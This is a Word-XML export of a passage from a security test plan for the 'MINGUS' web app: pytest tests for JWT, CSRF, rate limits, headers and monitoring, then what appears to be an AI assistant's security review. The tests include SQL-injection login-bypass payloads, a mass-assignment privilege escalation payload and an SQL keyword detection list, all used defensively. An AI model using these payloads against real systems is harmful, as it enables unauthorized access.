      </w:r>
    </w:p>
    <w:p w14:paraId="737AF29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"""Test JWT validation with IP address consistency"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB8CB7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from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backend.security.auth_security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import SecureJWTManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22627AF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3713E3F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mock_request.remote_addr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'192.168.1.100'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111D683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mock_request.headers.get.return_value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'Test User Agent'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303354D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3C4A1CD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jwt_manager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SecureJWTManager()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0242079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3A29829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Create token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6582F1A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token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jwt_manager.create_secure_token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('user123')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7DA9F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4EEE9D8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Validate with same IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331E4FC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result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jwt_manager.validate_secure_token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(token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE7A2A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result["valid"], "Token validation failed with correct IP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D57588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2AEB080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Validate with different IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A0EDF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mock_request.remote_addr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'192.168.1.101'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D5A6E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result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jwt_manager.validate_secure_token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(token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74717A2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not result["valid"], "Token validation succeeded with different IP"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40693DB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"IP address mismatch" in result["reason"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2072151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539ED06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test_token_expiration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0EAD746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"""Test token expiration handling"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5778B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from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backend.security.auth_security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import SecureJWTManager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BF1AD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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437658F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2E3FDCE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jwt_manager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SecureJWTManager()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630AC70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2F828FC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Create token with short expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED32B5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with patch('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return_value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=1000000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631DB0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token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jwt_manager.create_secure_token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('user123')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AD820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86112A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Try to validate expired token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F14F2D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with patch('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time.time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return_value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=1000000 + 3700):  # 1 hour + 1 minute later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B5548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result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jwt_manager.validate_secure_token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(token)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4477EBB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assert not result["valid"], "Expired token validation succeeded"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479AF2A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assert "Token expired" in result["reason"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5B870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856C36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TestRateLimiting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7393D77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setup_method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09BD797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create_app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('testing')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E8F17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self.client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self.app.test_client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37834C8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self.app.app_context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431B8DA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self.app_context.push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13169C8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6580DFB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teardown_method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1C1300B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self.app_context.pop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200F3DC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03C1D83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test_assessment_submission_rate_limit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3E9025B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"""Test rate limiting on assessment submissions"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B03F41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Simulate multiple rapid assessment submissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B7CD9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23567B9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'responses': {'q1': 'answer1', 'q2': 'answer2'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CFF4A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'type':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ai_job_risk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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE93EE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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021ED90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4794C8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First 3 submissions should succeed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7955C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in range(3):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DC540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response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self.client.post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/assessments/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ai_job_risk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/submit',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090C5A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         data=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json.dumps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),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFB25C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content_type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='application/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E43CA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assert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response.status_code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!= 429,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f"Request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{i+1} was rate limited unexpectedly"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F7768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578C260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4th submission should be rate limited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B27A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response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self.client.post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/assessments/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ai_job_risk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/submit',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794D982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     data=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json.dumps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),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D2B92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content_type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='application/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F15F4C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response.status_code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== 429, "Rate limit not enforced"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285CF19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'Retry-After'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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10AD835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B93F3F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TestCSRFProtection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2602813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setup_method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492460B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create_app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('testing')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139F33B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self.client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self.app.test_client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5D90724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self.app.app_context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097E37B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self.app_context.push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4A2B1F7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73642CB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teardown_method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65136F2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self.app_context.pop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359CC1F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59CA693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test_csrf_token_required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453425B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"""Test CSRF token requirement"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C97040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4881EBF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'responses': {'q1': 'answer1'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4531F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'type':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ai_job_risk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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689B0AD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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFC2E8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4B91C90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Request without CSRF token should fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D9350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response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self.client.post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/assessments/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ai_job_risk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/submit',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D35B0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     data=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json.dumps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),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458ECF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content_type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='application/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5286D6F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response.status_code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== 403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F2379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b'CSRF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token required'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response.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7C4AB47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58F9ACD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test_invalid_csrf_token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7D699BA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"""Test invalid CSRF token rejection"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57867D0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5D76C06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'responses': {'q1': 'answer1'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC0AB0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'type':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ai_job_risk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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6E037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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508695A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56275FA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headers = {'X-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CSRFToken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'invalid_token_123'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8DC13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response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self.client.post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/assessments/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ai_job_risk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/submit',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3B421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     data=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json.dumps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),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48641D2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content_type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='application/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BFAAC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     headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B084C7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response.status_code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== 403</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7869804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b'Invalid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CSRF token'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response.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="026C612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2D87BE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TestSecurityHeaders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1614FE4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setup_method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3E6B68E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create_app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('testing')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A3EC2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self.client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self.app.test_client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60A6D77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self.app.app_context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7BA5383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self.app_context.push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0C6A681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69288A4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teardown_method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534DC80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self.app_context.pop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69FF35D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7EC0702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test_security_headers_present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379AC70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"""Test that security headers are properly set"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D343E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response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self.client.get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('/')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE1746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7A3C3C3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for security headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DEA97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('X-Content-Type-Options') ==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nosniff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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401785B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('X-Frame-Options') == 'DENY'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61713E0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('X-XSS-Protection') == '1; mode=block'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5064909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'max-age=31536000'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('Strict-Transport-Security', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0CD89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'default-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src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'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('Content-Security-Policy', '')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DDCE8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('Referrer-Policy') == 'strict-origin-when-cross-origin'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484806C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0E39BB7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that server header is removed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D8B72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'Server' not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response.headers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2FF6B8C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71C1FF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TestSecurityMonitoring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7D03D10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setup_method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1676C22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create_app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('testing')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6503061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self.app.app_context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400D9BD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self.app_context.push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652047C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226E210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teardown_method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75F6599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self.app_context.pop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06D8EC3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4AEA264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test_security_event_logging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13CB9C7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"""Test security event logging functionality"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053EEBF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from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backend.security.security_monitor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SecurityMonitor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="59EFD91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168508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monitor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SecurityMonitor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79E6FB1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2D3BF20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Test logging a security event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC0F1C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monitor.log_security_event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</w:p>
    <w:p w14:paraId="5809179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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDAFF0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_user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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7797F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{'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test_detail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test_value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'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0D136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'WARNING'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AF27C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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64949A7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33F7678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 ==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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354C8AA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user_identifier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'] ==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test_user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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F065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['severity'] == 'WARNING'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42545A1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assert 'timestamp'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event_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39109CD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4D5E9DD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@patch('backend.security.security_monitor.SecurityAlerter.send_security_alert_email')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D9BC2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test_security_alert_threshold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mock_send_alert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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59144B2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"""Test security alert threshold triggering"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A951F3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from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backend.security.security_monitor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SecurityMonitor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45DA81D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AB3729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monitor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SecurityMonitor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013EE24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47B306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Simulate multiple failed login attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FBE5B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in range(6):  # Threshold is 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA9433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monitor.log_security_event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</w:p>
    <w:p w14:paraId="2E83D69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auth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_failure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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CB46C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f'user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_{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}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6617E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{'attempt': i+1},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B0D9A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'WARNING'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BC85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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2861B38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473140E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that alert was triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47937EE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mock_send_alert.assert_called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0077A150" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Penetration Testing Simulation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08741B2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TestPenetrationScenarios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6943987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setup_method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613DE48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create_app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('testing')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7469B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self.client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self.app.test_client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7308F33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self.app.app_context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39684FD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self.app_context.push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71CCAFE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5485B40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teardown_method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2858022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self.app_context.pop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53575FF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5A088F3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test_authentication_bypass_attempts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156B3C0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"""Simulate authentication bypass attempts"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEB76F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bypass_payloads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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D40D7E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{'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'admin', 'password': "' OR '1'='1"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA856E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{'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'admin', 'password': '" OR "1"="1'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B5B9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{'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'admin', 'password': "' OR 1=1 --"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4894E6F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{'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'admin', 'password': "admin'/**/OR/**/1=1"},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136CDC3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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5249A91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EE983A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for payload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bypass_payloads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0F6D119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response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self.client.post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/auth/login',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66477E1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         data=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json.dumps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(payload),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCAB0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content_type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='application/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F9ABE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assert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response.status_code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!= 200,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f"Authentication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bypass succeeded with payload: {payload}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C452CA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04D03F5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test_privilege_escalation_attempts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441BD47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"""Simulate privilege escalation attempts"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB382F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Test accessing admin endpoints without proper authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B5445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admin_endpoints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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0B46A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/admin/users',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A30D8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/admin/assessments/stats',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549B94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/admin/security/logs'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4854863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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAEE8F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6A2D246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for endpoint in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admin_endpoints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60DA4BD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response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self.client.get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(endpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319D9CA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assert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response.status_code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in [401, 403],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f"Unauthorized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access allowed to {endpoint}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F891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4B89EED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test_mass_assignment_vulnerability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059CD1F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"""Test for mass assignment vulnerabilities"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3020C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Attempt to modify protected fields</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D679FD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malicious_payload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5B6C7BB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'responses': {'q1': 'answer1'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD3B9B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'type':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ai_job_risk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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3488298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is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_admin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True,  # Attempt to assign admin privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ACD7C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_role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'administrator',  # Attempt role escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDE198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subscription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_tier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'premium'  # Attempt to upgrade subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568600A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD49BE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106DC97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response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self.client.post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/assessments/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ai_job_risk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/submit',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED64D9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     data=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json.dumps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malicious_payload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),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6A992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              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content_type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='application/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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A815E9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10163A9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Check that protected fields were not assigned</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD1AE9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response.status_code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== 200:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2459A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data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json.loads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response.data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0F906AB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assert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is_admin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 not in data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A721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assert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user_role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 not in data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D7385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assert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subscription_tier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 not in data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2598471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DEC9BD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Security test configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592285E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pytest.ini = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C78CF9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[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tool:pytest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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C1467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markers = </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB96FA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security: marks tests as security tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFCBEB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slow: marks tests as slow running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C7D8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testpaths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tests/security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED81C6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python_files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test_*.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C6610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python_classes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Test*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8519A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python_functions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test_*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0935891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addopts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-v --tb=short</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D8E90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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D70C22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9D541B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Run security tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0547B4E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def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run_security_tests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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF388B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"""Run all security tests and generate report"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD1827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import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F86035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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233AF5B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27F1A13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Run security-specific tests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC34B4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result =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subprocess.run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([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2B730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sys.executable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'-m', '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pytest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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9A39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</w:t>
      </w:r>
      <w:proofErr w:type="gram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tests</w:t>
      </w:r>
      <w:proofErr w:type="gram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/security/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2535F15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'--tb=short',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21773D8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'-v',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7680A8C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'--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junit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-xml=security-test-results.xml',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D8C03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'--html=security-test-report.html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56533F5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'--self-contained-html'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B2F23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],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capture_output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=True, text=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3603AFA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46767AE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print("Security Test Results:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A56A71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result.stdout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79552B1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if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result.stderr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5364113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print("Errors:",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result.stderr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40F5337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19C31BF8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result.returncode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004007A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== 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D14A91F" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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Integration Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA8F4A9" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Run security tests as part of CI/CD pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BECE8A" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Fail deployment if critical security tests fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B064121" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Generate security test reports for compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FD3CEB" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Integrate with existing test suite infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6316EA78" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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4007AE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Set up automated security scanning with tools like bandit and safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012DFB6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1250E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5B7318C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F4959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UPDATED IMPLEMENTATION CHECKLIST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A76A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46A72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Phase S: Security Implementation (CRITICAL - MUST COMPLETE FIRST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28867B4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 ] S1: Input validation and injection prevention implemented</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A330D0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 ] S2: JWT security and authentication hardening complete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2388C4E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 ] S3: CSRF protection and security headers deployed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F5A9B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 ] S4: Rate limiting and API security active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7C408B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 ] S5: Security monitoring and logging operational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C512C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 ] S6: Security test suite passing with 100% success rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D2C2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431321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Phase 0: Critical Corrections (After Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6641BFB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 ] 0A: Tax Calculator with security integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0364AA73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 ] 0B: Exact algorithms with security validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EB9E8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 ] 0C: Architecture integration with security layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352D3C9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7B4D3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Phase 1-8: Original Implementation (Security-Hardened)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F272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 ] All original prompts 1-8 with integrated security measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139ED98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 ] Security validation at each step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500B739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 ] Penetration testing after each phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625D80F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29E7F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SECURITY SUCCESS CRITERIA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB4ACD9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57CA9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**Zero High/Critical Vulnerabilities**: All security scans must pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0302C5F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**100% Security Test Coverage**: All security tests must pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C714B6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**Rate Limiting Active**: All endpoints properly rate limited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4167855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**Authentication Hardened**: JWT validation with IP/UA checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B743FCA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**Input Validation Complete**: All inputs validated against injection attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BFFDA6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**Security Monitoring Active**: All security events logged and alerted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6172BE4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**HTTPS Enforced**: All communications encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA256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**Security Headers Present**: All responses include security headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C78923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8E269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MANDATORY SECURITY GATES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206C3EB0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AD9DC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**No deployment without passing security tests**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A01AD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**No production access without authentication hardening**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576F40C2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**No public endpoints without rate limiting**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6214366E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**No user input without validation**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C78FFA4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**No sensitive operations without CSRF protection**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F3FCB7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**No production logs without security monitoring**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1332AC8F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12A6A5" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004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07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security-first approach ensures the MINGUS assessment system is production-ready and resistant to common web application vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D333585" w14:textId="588FC05C" w:rsidR="004007AE" w:rsidRDefault="004007AE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CB413A0" w14:textId="5274FDA3" w:rsidR="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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Security Issues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With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Landing Page Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2485877A" w14:textId="77777777" w:rsidR="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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C188CB8" w14:textId="1361A863" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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ased on the test results and the comprehensive test suite I've created, I can identify several security issues that need to be addressed in the MINGUS application. Let me analyze the security test results and provide a detailed breakdown:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DB5259" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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6D3994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🔒</w:t>
      </w:r>
      <w:r w:rsidRPr="006D399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 Security Issues Identified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF30290" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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1. Test Results Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B62D2B" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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From the comprehensive test run, I can see that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EFC92C" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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Security tests are passing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(</w:t>
      </w:r>
      <w:r w:rsidRPr="006D399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Security tests PASSED)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E05953F" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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However, the final report shows: </w:t>
      </w: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"Security issues found: - Security tests failed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273B59E5" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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 indicates that while the security test framework is working, there may be underlying issues that need attention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF46F06" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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2. Specific Security Vulnerabilities to Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5401EE" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D39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A. Input Validation &amp; Injection Prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DB15F9" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE6DDE1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Current security validation in tests/test_simple.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DAD448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validate_input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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006D3994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input_string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670EBC4C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dangerous_patterns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:p>
    <w:p w14:paraId="3B5AB069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"'; drop table"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212E8F34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"'; delete from"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</w:p>
    <w:p w14:paraId="12387651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"'; insert into"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1B1FAC4A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"'; update"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29214277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"'; select * from"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF8FD1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</w:p>
    <w:p w14:paraId="163D34CC" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D399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Issues to Address:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451F30EE" w14:textId="77777777" w:rsidR="006D3994" w:rsidRPr="006D3994" w:rsidRDefault="006D3994" w:rsidP="006D3994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SQL Injection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Need more comprehensive pattern detection</w:t>
      </w:r>
    </w:p>
